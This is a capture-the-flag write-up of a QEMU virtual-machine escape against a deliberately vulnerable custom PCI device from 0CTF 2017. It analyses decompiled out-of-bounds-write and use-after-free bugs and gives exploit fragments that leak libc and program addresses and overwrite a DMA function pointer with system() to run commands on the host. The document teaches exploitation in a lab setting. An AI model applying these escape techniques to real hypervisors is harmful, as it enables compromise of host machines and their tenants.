QEMU Escape --- vm_escape from 0CTF 2017 Finals Writeup

Jun 16, 2017 in writeups

It’s a great challenge to get familiar with QEMU escape. We are going to exploit QEMU via a custom vulnerable device.

You should read VM escape - QEMU Case Study before reading this writeup.

Challenge

challenge
├── dependency
│   ├── libnettle.so.6.2
│   └── usr
│       └── local
│           └── share
│               └── qemu
│                   ├── bios-256k.bin
│                   ├── efi-e1000.rom
│                   ├── kvmvapic.bin
│                   ├── linuxboot_dma.bin
│                   └── vgabios-stdvga.bin
├── launch.sh
├── qemu-system-x86_64
├── rootfs.cpio
└── vmlinuz-4.8.0-52-generic

There is a qemu-system-x86_64 binary with a launch script, a linux kernel, a initramfs and some dependencies.

We can get an interactive shell by executing launch.sh.

    __ __ _____________   __   __    ___    ____
   / //_// ____/ ____/ | / /  / /   /   |  / __ )
  / ,<  / __/ / __/ /  |/ /  / /   / /| | / __  |
 / /| |/ /___/ /___/ /|  /  / /___/ ___ |/ /_/ /
/_/ |_/_____/_____/_/ |_/  /_____/_/  |_/_____/

Welcome to Tencent Keenlab
Tencent login: root
# uname -r
4.8.0-52-generic
#

The custom vulnerable device

luanch.sh shows there are two custom device named vdd.

1 2	$ ./qemu-system-x86_64 -device help 2>&1 \| grep VDD name "VDD", bus PCI, desc "KeenLab virtualized Devices For Testing D"

we can use some commands to find these devices and their io port/memroy.

# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:05.0 Class 00ff: 1234:2333
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
# cat /proc/iomem
...
  fe900000-fe9fffff : 0000:00:04.0
  fea00000-feafffff : 0000:00:05.0
...
# cat /proc/ioports
...
  c000-c0ff : 0000:00:04.0
  c100-c1ff : 0000:00:05.0
...

OOBW

In vdd_mmio_write, there is a out-of-bound write vulnerability which copys QEMU heap memory to guset physical memory when we set dma_len larger than sizeof(dam_buf).

void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v4; // rax@21

  if ( opaque->dma_state )
  {
    ...
    else
    {
      switch ( addr )
      {
        ...
        case 32uLL:
          ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
            opaque->dma_buf,
            opaque->dma_state->dst,
            opaque->dma_len);                   // OOB write
          break;
        ...
      }
    }
  }
}

UAF

Also in vdd_mmio_write, if addr == 128 and opaque->sr[129] & 1 != 0, we can set a timer which will execute vdd_dma_timer after opaque->expire_time ns.

void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v4; // rax@21

  if ( opaque->dma_state )
  {
    ...
    else if ( addr > 0x24 )
    {
      if ( addr == 128 )
      {
        if ( opaque->sr[129] & 1 )
        {
          v4 = qemu_clock_get_ns(0);
          timer_mod(&opaque->dma_timer, v4 + opaque->expire_time);
        }
      }
      ...
  }
}

In vdd_dma_timer, it invokes opaque->dma_state->phys_mem_read/write.

void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
  if ( opaque->dma_state->cmd )
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  else
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  if ( opaque->dma_state->cmd == 1 )
    vdd_raise_irq(opaque, 0x100u);
}

If pci_vdd_uninit is invoked before vdd_dma_timer, the dma_state will be used after free.

void __fastcall pci_vdd_uninit(TencentPCIState *opaque)
{
  __int64 v1; // rax@5
  __int64 v2; // [rsp+28h] [rbp-8h]@1

  v2 = *MK_FP(__FS__, 40LL);
  memset(opaque->sr, 0, 0x100uLL);
  if ( opaque->dma_state )
  {
    memset(opaque->dma_state, 0, 0x330uLL);
    g_free((rcu_head *)opaque->dma_state);
  }
  if ( opaque->buf )
    g_free((rcu_head *)opaque->buf);
  v1 = *MK_FP(__FS__, 40LL) ^ v2;
}

Exploitation

The exploitation is divided into two steps:

leak QEMU program address.
hijack control flow

Leak QEMU program address

First, we allocate a buffer and get it’s physical address. Then we set dma_state->dst to our buffer and set dma_len larger than sizeof(dma_buf). Finally, we trigger phys_mem_write by writel(0, piomem + 32). By searching the output, we can find libc addresses and program addresses then calculate the base address of program/libc.

void phys_mem_write(unsigned int dst, unsigned int len)
{
    set_dmastate_dst(dst);
    set_dmalen(len);
    writel(0, piomem + 32);
}

void mem_leak(void)
{
    pbuf = (unsigned long)kmalloc(0x10000, GFP_KERNEL);
    memset(pbuf, 0, 0x10000);
    phys_mem_write(virt_to_phys(pbuf), 0x1000);
    // xxd(pbuf, 0x1000);
    libc_base = search_libc_addr(pbuf, 0x1000);
    printk("libc base:0x%lx\n", libc_base);
    prog_base = search_prog_addr(pbuf, 0x1000);
    printk("program base:0x%lx\n", prog_base);
    system_addr = prog_base + SYSTEM_OFFSET;
    printk("system addr:0x%lx\n", system_addr);
}

Control RIP

There are three steps to exploit the use-after-free vulnerability:

set a timer
trigger pci_vdd_uninit
reallocte and rewrite dma_state

The following command can trigger pci_vdd_uninit

1	echo 0 > /sys/bus/pci/slots/4/power

When vdd_dma_timer runs, we can control rip.

void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
  if ( opaque->dma_state->cmd )
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  else
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  if ( opaque->dma_state->cmd == 1 )
    vdd_raise_irq(opaque, 0x100u);
}

Becasue the QEMU is launched with --nographic -append 'console=ttyS0', so we can simply invoke system(cmd) to run a command in host machine and the output will show in console.

To invoke system(cmd), We need to:

set opaque->dma_state->phys_mem_read to system
set opaque->dma_buf to cmd
make sure opaque->dma_state->cmd != 0.

In vdd_linear_write, when addr == 0, a buffer will be allocated with size of opaque->dma_len. And the data in opaque->dma_state->src with length of opaque->dma_len will be copied to opaque->buf, then copied to opaque->dma_state->dst

void __fastcall vdd_linear_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  if ( opaque->dma_state && addr <= 13 )
  {
    switch ( (_DWORD)((char *)off_6EF324 + off_6EF324[addr]) )
    {
      case 0:
        if ( opaque->buf )
          g_free((rcu_head *)opaque->buf);
        opaque->buf = (uint8_t *)g_malloc0(opaque->dma_len);
        vdd_dma_read(opaque->buf, opaque->dma_state->src, opaque->dma_len);
        vdd_dma_write(opaque->buf, opaque->dma_state->dst, opaque->dma_len);
        break;
      ...
    }
  }
}

void put_fake_dma(void)
{
    struct dma fakedma;
    fakedma.cmd = 2;
    fakedma.phys_mem_read = system_addr;
    memcpy(pbuf, (void *)&fakedma, sizeof(fakedma));
    set_dmalen(0x330);
    set_dmastate_src(virt_to_phys(pbuf));
    set_dmastate_dst(virt_to_phys(pbuf));
    outb(0, VDB_PORT + 0);
}

Exploit script

Thanks for Atum’s help.

Comment and share